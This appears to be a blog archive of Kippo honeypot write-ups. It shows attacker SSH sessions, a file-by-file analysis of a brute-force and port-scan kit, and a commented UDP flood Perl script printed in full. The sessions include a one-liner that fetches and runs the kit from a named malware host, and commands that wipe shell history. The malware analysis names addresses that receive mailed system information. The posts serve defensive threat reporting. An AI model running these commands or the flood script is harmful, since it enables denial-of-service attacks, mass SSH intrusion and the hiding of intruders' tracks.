Skip navigation

Tag Archives: kippo

After successfully brute forcing their way into kippo, the attacker downloaded a collection of bruteforce/portscan tools, untarred them, and kicked the whole thing off.

dev:~# wget qiss.ucoz.com/go.jpg;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61

The malware itself seemed mostly unmodified from the last time it was reported on, but the address it phones home to was different, so I thought I’d post this so anyone dealing with the same sample has a record of movements.

    Files:

1, 2, 3, 4, 5, 6, common
– these are just lists of usernames/passwords

a
– aab6510d149ddfbdf3598c4b94c4b7b3
– executes ‘pscan2’
– copies each password list into ‘mfu.txt’, and then launches ‘ssh-scan 100’

ssh-scan
– a213ebd69fbc11d612d0374b373f65d8

gen-pass.sh
– 615c08bb1acdf2f21490450991766187
– takes a list of users and passwords, dumps all user:pass permutations into ‘pass_file’

pass-file
– the user:pass permutations from ‘gen-pass.sh’

screen
– cbf0f41bbbafb1c2609bedb943be3b36

go
– 92c4c68480e699aa012b26c82a787248
– sorts ‘bios.txt’ into a unique list, saves in ‘mfu.txt’, launches ‘./ssh-scan 300’

pscan2
– acba0143d0cbcf8092b8b44d914d7983
– given a block and a port, answers with responding ips in that block

secure
– 39acbfc1e983e45308cdab2d3ec4bf34
– a bash script that checks if you are root. If you are, it renames ‘/usr/bin/mail’. This is presumably to mess with any IDS on the system.

ss
– b51a52c9c82bb4401659b4c17c60f89f
– responsible for the content in ‘bios.txt’

vuln.txt
– contains the results from ‘a’

scam
– gathers system information, saves it to ‘info2’, mails it to mafia89tm@yahoo.com
– given the first 3 quarters of an IP address, executes ‘a’ on each of the 255 addresses within that space
– periodically, the results are mailed home to amadeoantiq@yahoo.com
– the author has also never heard of a for loop, as there are 255 lines of this:

./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

    Wall of Shame:

Attack Source: 79.117.232.182
Malware Host: qiss.ucoz.com/go.jpg
Malware Type: portscan / bruteforce
Phones Home: mafia89tm@yahoo.com / amadeoantiq@yahoo.com

Short but sweet.

dev:~# w
 09:27:26 up 29 days, 19:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
dev:~# export HISTFILE=/dev/null
dev:~# export HISTSIZE=0
dev:~# w
 09:27:58 up 29 days, 19:49,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
dev:~# wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN
-US/W2Ksp3.exe
--2012-10-25 09:30:05--  http://download.microsoft.com/download/win2000platform/
SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exe

 0% [>                                      ] 1,098        0K/s  eta 1d 21h 7m 1
 0% [>                                      ] 22,818       11K/s  eta 3h 11m 15s
 0% [>                                      ] 182,850      69K/s  eta 31m 27s
 2% [>                                      ] 3,149,716    363K/s  eta 5m 52s^C
200 OK
dev:~# rm -rf .bash_history
dev:~# touch .bash_history
dev:~#

Seems a little odd that our friend 79.147.238.131 (which appears to be a residential (but dynamically assigned…) IP) would go through so much effort just to disconnect the session, but oh well.

I set up a Kippo honeypot a few weeks ago on a micro Amazon instance and left it running, eventually letting it slip my mind. Today, I remembered to check it out, and what do you know, I got some results.

Unfortunately for our intruder, Kippo wasn’t particularly cooperative. Here’s the log:

dev:~# w
15:34:22 up 13 days, 1:55, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 5.13.84.3 15:34 0.00s 0.00s 0.00s w
dev:~# cat /proc/cpuinfo
[--- snip ---]
dev:~# wget http://cachefly.cachefly.net/100mb.test
--2012-10-08 15:35:37-- http://cachefly.cachefly.net/100mb.test
Connecting to cachefly.cachefly.net:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100mb.test

100%[======================================>] 104,857,600 10113K/s

2012-10-08 15:35:48 (10113 KB/s) - `100mb.test' saved [104857600/104857600]
dev:~# wget http://root-arhive.clan.su/flood/global/udp.tgz
--2012-10-08 15:36:00-- http://root-arhive.clan.su/flood/global/udp.tgz
Connecting to root-arhive.clan.su:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 529 (529bytes) [application/octet-stream]
Saving to: `udp.tgz

100%[======================================>] 529 0K/s

2012-10-08 15:36:01 (0 KB/s) - `udp.tgz' saved [529/529]
dev:~# tar xzvf udp.tgx
tar: udp.tgx: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
dev:~# tar xzvf udp.tgz
udp.pl
dev:~# chmod +x *
dev:~# perl udp.pl 12
bash: perl: command not found
dev:~# apt-get install perl
Reading package lists... Done
[--- snip ---]
Setting up perl (1.31-2) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~# apt-get install kernel*
Reading package lists... Done
[--- snip ---]
Setting up kernel (1.4-6) ...
dev:~# apt-get install linux*
Reading package lists... Done
[--- snip ---]
Setting up linux (1.12-8) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~#

This looks like a fairly typical attack. In short:

  • The hacker has connected from 5.13.84.3. The hacker runs w to see who else is around.
  • The hacker dumps the contents of /proc/cpuinfo to see what kind of machine they’re working with.
  • The hacker downloads http://cachefly.cachefly.net/100mb.test, presumably to check the speed of the connection.
  • The hacker downloads hxxp://root-arhive.clan.su/flood/global/udp.tgz. Looks like they want to use this machine to DoS, but I’ll take a closer look at that file in good time.
  • After this, we can see the hacker’s frustrated attempts to actually RUN their file. Naturally, Kippo is pretty uncooperative, so they soon get fed up and leave.

Now we can take a look at udp.pl. How exciting. The script itself is pretty obvious stuff, so I’ll go ahead and post it. Comments are mine:

#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit #GlobaL \n";
 exit(1);
}

# Takes three arguments: Target, port, and how long to flood for.
my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

# Prepares a socket connection. The last parameter is for the protocol, so I'm assuming 17 corresponds to UDP.
socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Flooding.. $ip port.. $port \n";

# If you haven't declared the port or duration...
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
# If you HAVE declared the port and duration
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
# If you have declared the port, but not the duration
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
# If you've declared the duration, but not the port
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

# Flood the given port
packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

# Flood a random port
randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

If you’re going to allow ssh access to your server, remember to secure it. Even if you don’t have any data worth stealing, it’s easy for people to turn your machine against others.